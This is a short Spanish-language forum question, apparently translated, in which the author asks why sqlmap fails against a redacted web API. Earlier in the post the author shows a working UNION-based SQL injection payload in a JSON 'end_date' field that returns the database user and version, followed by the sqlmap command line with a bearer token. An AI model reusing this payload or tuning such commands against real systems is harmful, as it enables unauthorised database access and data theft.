Esto es información de publicación, normalmente se ve así
{"end_date":"2018-8-26","start_date":"2018-8-26","success":1}
Debajo del resultado "Tienes un error ..."
{"end_date":"2018-8-26'","start_date":"2018-8-26","success":1}
A continuación, imprima con éxito la versión de db y la versión de usuario
{"end_date":"00:00:00') union select 1,user(),version();--+","start_date":"","success":1}
Lo que he hecho hasta ahora es
python sqlmap.py -u http://redacted.com/api/v1/endpoint --headers="Authorization: Bearer xxxx" --data='{"end_date":"00:00:00","start_date":"2018-8-26","success":1}' -p "end_date" --sql-query="00:00:00') union select 1,user(),version();--+" -v 3
Pero Sqlmap aún falló, ¿dónde estoy haciendo mal?
Gracias de antemano.